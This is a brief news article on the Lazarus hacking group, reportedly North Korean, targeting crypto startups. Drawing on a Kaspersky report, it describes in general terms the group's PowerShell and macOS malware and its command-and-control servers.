North Korean cybercrime group Lazarus still targeting crypto firms
It has been one of the most notorious cybercrime groups in the world for a number of years. Known as Lazarus, the group is believed to be from North Korea, with reports suggesting it’s sponsored by the country’s government. It has been behind some of the biggest heists, including the attack on Sony Entertainment, Lockheed Martin and the Bangladeshi central bank heist.
In recent times, its principal focus is the thriving field of crypto startups.
According to a report by Kaspersky Labs, the group has been evolving its tactics to avoid detection. Since November last year, Lazarus has had a new operation in which it takes over its victims’ computers. It uses PowerShell for Windows users, and customized macOS malware for Apple users.
The PowerShell scripts communicate with malicious C2 servers, executing commands from the operator. The malware can download and upload files, show and update malware configuration and collect basic information from the host.
Lazarus acquires the servers by either buying new ones or hacking already existing servers. Whenever they hack servers, it’s much harder to detect the attack as the server looks legitimate. The servers are located on different continents, with Asia and Europe having the most. ..Read more..